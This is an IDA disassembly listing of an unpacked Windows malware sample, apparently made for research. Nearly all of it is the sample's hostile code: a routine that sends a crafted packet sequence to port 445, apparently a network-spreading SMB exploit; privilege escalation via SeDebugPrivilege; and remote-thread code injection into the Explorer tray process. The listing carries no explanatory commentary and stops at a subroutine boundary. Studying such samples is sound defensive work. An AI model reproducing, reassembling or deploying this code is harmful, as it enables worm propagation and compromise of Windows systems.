;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : E46622E5357820A1649CA91B54AAF855
; File Name : u:\work\e46622e5357820a1649ca91b54aaf855_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DE089Eh ; DATA XREF: sub_31502889+90�r
dword_31501004 dd 77DE07A3h ; DATA XREF: sub_31502889+A2�r
dword_31501008 dd 77DE0D79h ; DATA XREF: sub_31502889+C8�r
dword_3150100C dd 77DE0343h ; DATA XREF: sub_31502889+DB�r
; sub_31502889+FD�r
dword_31501010 dd 77DE0AF0h ; DATA XREF: sub_3150286E+6�r
dword_31501014 dd 77DE042Eh ; DATA XREF: sub_3150286E+11�r
dword_31501018 dd 77DDEBA2h ; DATA XREF: sub_3150281A+2�r
dword_3150101C dd 77DE0BB2h ; DATA XREF: sub_3150281A+41�r
dword_31501020 dd 77DD590Bh ; DATA XREF: sub_31502418+1A�r
dword_31501024 dd 77DD59F0h ; DATA XREF: sub_31502418+38�r
dword_31501028 dd 77DD23D7h ; DATA XREF: sub_315023BF+3E�r
dword_3150102C dd 77DD22EAh ; DATA XREF: sub_3150238A+14�r
; sub_315023BF+1D�r
dword_31501030 dd 77DD5C55h ; DATA XREF: sub_3150238A+24�r
dword_31501034 dd 77DD189Ah ; DATA XREF: sub_3150238A+2D�r
; sub_315023BF+4E�r ...
dword_31501038 dd 77E2A571h ; DATA XREF: sub_31501D89+160�r
align 10h
dword_31501040 dd 77E76432h, 77E7513Ch ; DATA XREF: sub_315036FD+14C�r
; sub_315036FD:loc_31503943�r ...
dword_31501048 dd 77E705C5h ; DATA XREF: sub_315029A2+4C�r
; sub_315029A2+14B�r
dword_3150104C dd 77E79D8Ch ; DATA XREF: sub_315029A2+F2�r
; sub_315035E3+ED�r
dword_31501050 dd 77E61608h ; DATA XREF: sub_31502889+10�r
; sub_3150334C+A�r
dword_31501054 dd 77E77C4Ch ; DATA XREF: sub_31502889+1E�r
dword_31501058 dd 77E79E34h ; DATA XREF: sub_315027EF+B�r
dword_3150105C dd 77E7980Ah ; DATA XREF: sub_315027DB+D�r
dword_31501060 dd 77E7A099h ; DATA XREF: sub_3150269D+17�r
dword_31501064 dd 77E76A2Eh ; DATA XREF: sub_3150269D+E9�r
dword_31501068 dd 77E704FCh ; DATA XREF: sub_315025D1+1B�r
; sub_315029A2+3F�r ...
dword_3150106C dd 77E74155h ; DATA XREF: sub_315025D1+40�r
; UPX0:31503423�r ...
dword_31501070 dd 77E6BD13h ; DATA XREF: sub_315025D1+71�r
dword_31501074 dd 77E684C6h ; DATA XREF: sub_315025D1+B0�r
dword_31501078 dd 77EBB1E7h ; DATA XREF: sub_31503A9C�r
dword_3150107C dd 77EBA595h ; DATA XREF: sub_31503A96�r
dword_31501080 dd 77E616B4h ; DATA XREF: sub_3150246B+9B�r
dword_31501084 dd 77EBA6E9h ; DATA XREF: sub_31503A90�r
dword_31501088 dd 77E73167h ; DATA XREF: sub_31502252+13�r
; sub_3150269D+8F�r ...
dword_3150108C dd 77E777EFh ; DATA XREF: sub_31502103+3F�r
; sub_3150218B+58�r
dword_31501090 dd 77E737DEh ; DATA XREF: sub_31501D89+2D�r
; sub_31502BC3+98�r
dword_31501094 dd 77E79D5Bh ; DATA XREF: sub_31501D75+8�r
; sub_31502BC3+C2�r
dword_31501098 dd 77E73628h ; DATA XREF: UPX0:31501D1D�r
; sub_315025D1+F�r
dword_3150109C dd 77F5157Dh ; DATA XREF: UPX0:31501D38�r
; sub_31502889:loc_3150295B�r ...
dword_315010A0 dd 77E74672h ; DATA XREF: sub_315011C0+253�r
; sub_315011C0+272�r ...
dword_315010A4 dd 77E61BE6h ; DATA XREF: sub_315011C0+16C�r
; sub_31501A62+E2�r ...
dword_315010A8 dd 77E73BEFh ; DATA XREF: sub_315011C0+4F�r
; sub_315029A2+69�r ...
dword_315010AC dd 77E79C90h ; DATA XREF: sub_31501727+4D�r
dword_315010B0 dd 77E7A5FDh ; DATA XREF: sub_31501727+13�r
; sub_315017AF+2C�r
dword_315010B4 dd 77E805D8h ; DATA XREF: sub_31501727+D�r
; sub_31501D89+D4�r
dword_315010B8 dd 77E61A90h ; DATA XREF: sub_315017AF+BC�r
dword_315010BC dd 77E77963h ; DATA XREF: sub_315017AF+AA�r
; sub_31501911+19�r ...
dword_315010C0 dd 77E706B7h ; DATA XREF: sub_315017AF+8A�r
; sub_3150246B+92�r
dword_315010C4 dd 77E79F93h ; DATA XREF: sub_315017AF+26�r
; UPX0:31501D0D�r
dword_315010C8 dd 77E7751Ah ; DATA XREF: sub_315018BA+12�r
; sub_315031C7+13�r ...
dword_315010CC dd 77E7C2C4h ; DATA XREF: sub_315018E8+8�r
dword_315010D0 dd 77E7AC37h ; DATA XREF: sub_315018F7+12�r
; sub_31501911+12�r ...
dword_315010D4 dd 77E61BB8h ; DATA XREF: sub_31501962+38�r
dword_315010D8 dd 77E74A3Bh ; DATA XREF: sub_31501A48+13�r
; sub_31502B27+1B�r
dword_315010DC dd 77E73AB3h ; DATA XREF: sub_31501A48+8�r
dword_315010E0 dd 77E73C49h ; DATA XREF: sub_31501A62+12A�r
; sub_31501B9B+66�r ...
dword_315010E4 dd 77E78B82h ; DATA XREF: sub_31501B9B+92�r
dword_315010E8 dd 77E793EFh ; DATA XREF: sub_31501B9B+6E�r
dword_315010EC dd 77E7A837h ; DATA XREF: sub_31501B9B+57�r
; sub_315029A2+83�r ...
dword_315010F0 dd 77E75CB5h ; DATA XREF: UPX0:31501D47�r
; sub_315025D1+C3�r
dd 0
dword_315010F8 dd 77C1BE00h ; DATA XREF: sub_315036FD+1F3�r
dword_315010FC dd 77C48520h ; DATA XREF: sub_31503A8A�r
dword_31501100 dd 77C48D44h ; DATA XREF: sub_31503A84�r
dword_31501104 dd 77C48674h ; DATA XREF: sub_31503A7E�r
; ---------------------------------------------------------------------------
loc_31501108: ; DATA XREF: sub_31503A78�r
xor [edx], bl
retn 0D877h ; DATA XREF: UPX0:loc_31503A72�r
; ---------------------------------------------------------------------------
db 1Ah, 0C2h, 77h
dword_31501110 dd 77C43500h ; DATA XREF: sub_31502C92+37�r
; sub_315036FD+B9�r
dword_31501114 dd 77C41FA0h ; DATA XREF: sub_31503A6C�r
dword_31501118 dd 77C41FB0h ; DATA XREF: sub_31503A66�r
; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A60�r
mov al, 3Eh
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C43AB0h ; DATA XREF: sub_31501A62:loc_31501A93�r
; sub_3150246B+79�r ...
dword_31501124 dd 77C3528Dh ; DATA XREF: sub_31501932:loc_31501943�r
; sub_31501B9B:loc_31501C69�r ...
dword_31501128 dd 77C35280h ; DATA XREF: sub_315018BA+22�r
; sub_3150334C+5D�r
dword_3150112C dd 77C42E10h ; DATA XREF: sub_31503A1E�r
dword_31501130 dd 77C43710h ; DATA XREF: sub_31503A18�r
dword_31501134 dd 77C43490h ; DATA XREF: sub_31503A12�r
dd 0
dword_3150113C dd 77D4C96Ah ; DATA XREF: sub_315011C0+62�r
; sub_31501A62+8B�r ...
dword_31501140 dd 77D4456Bh ; DATA XREF: sub_315017AF+67�r
dword_31501144 dd 77D4BDCAh ; DATA XREF: sub_315017AF+5D�r
dword_31501148 dd 77D45CBCh ; DATA XREF: sub_315017AF+7A�r
align 10h
dword_31501150 dd 76214750h ; DATA XREF: sub_315035E3+A9�r
dword_31501154 dd 7620AFB6h ; DATA XREF: sub_315035E3+18�r
dword_31501158 dd 7620BD61h ; DATA XREF: sub_315035E3+DB�r
dword_3150115C dd 762211EFh ; DATA XREF: sub_31501A32+8�r
; UPX0:315022E2�r
dd 0
dword_31501164 dd 71AB1890h ; DATA XREF: sub_315031C7+50�r
dword_31501168 dd 71AB12A7h ; DATA XREF: sub_31501F46+5B�r
dword_3150116C dd 71AB41DAh ; DATA XREF: sub_31501CDF+10�r
dword_31501170 dd 71AB3ECEh ; DATA XREF: sub_31501B9B+100�r
; sub_31501F46+7A�r ...
dword_31501174 dd 71AB5DE2h ; DATA XREF: sub_31501B9B+10D�r
; sub_31501F46+93�r ...
dword_31501178 dd 71AB868Dh ; DATA XREF: sub_31501B9B+120�r
; sub_31501F46+B5�r ...
dword_3150117C dd 71AB32CAh ; DATA XREF: sub_315019F3+C�r
dword_31501180 dd 71AB1740h ; DATA XREF: sub_315019F3+17�r
dword_31501184 dd 71AB12F8h ; DATA XREF: sub_315019B8+7�r
dword_31501188 dd 71AB2BBFh ; DATA XREF: sub_315019B8+1E�r
; sub_315019F3+25�r
dword_3150118C dd 71AB3C22h ; DATA XREF: sub_315011C0+2B�r
; sub_31501B9B+AC�r ...
dword_31501190 dd 71AB401Ch ; DATA XREF: sub_315011C0+44�r
; sub_31502252+D�r
dword_31501194 dd 71AB1746h ; DATA XREF: sub_315011C0+147�r
; sub_31501B9B+F0�r ...
dword_31501198 dd 71AB3E5Dh ; DATA XREF: sub_315011C0+15D�r
; sub_31502DC7+46�r
dword_3150119C dd 71AB1AF4h ; DATA XREF: sub_315011C0+17B�r
; sub_31501A62+67�r ...
dword_315011A0 dd 71AB5690h ; DATA XREF: sub_315011C0+1A4�r
; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AB8629h ; DATA XREF: sub_315011C0+550�r
; sub_31501A62+11B�r
dword_315011A8 dd 71AB1A6Dh ; DATA XREF: sub_315011C0+559�r
; sub_31501A62+122�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31501D89+5�o
dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_3150209F+36�p
; sub_31502103+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A30
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8 ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A1E ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A18 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A1E ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A12 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A12 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A12 ; memset
add esp, 0Ch
push offset byte_31505000
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A1E ; memcpy
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A1E ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A1E ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A1E ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A12 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A1E ; memcpy
push offset byte_31505000
call sub_31503A18 ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A1E ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A1E ; memcpy
add esp, 40h
push offset byte_31505000
call sub_31503A18 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A12 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A12 ; memset
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A1E ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A1E ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4 ; shutdown
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8 ; closesocket
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D4D�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4 ; LoadLibraryA
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D61�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506180
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4 ; GetModuleHandleA
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144 ; FindWindowA
test eax, eax
jnz short loc_31501824
call dword_31501140 ; GetForegroundWindow
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8 ; WriteProcessMemory
push ds:dword_31506154
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi ; CloseHandle
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501B9B+B�p
; UPX0:31501D23�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D2D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC ; CreateMutexA
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D89+12D�p
; sub_31501D89+138�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501B9B+12C�p
; sub_31501D89+113�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
push eax
call dword_315010BC ; CloseHandle
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F46+26�p
; sub_315025D1+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029A2+16B�p
; sub_315035E3+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A12 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DC7+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188 ; gethostbyname
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
; =============== S U B R O U T I N E =======================================
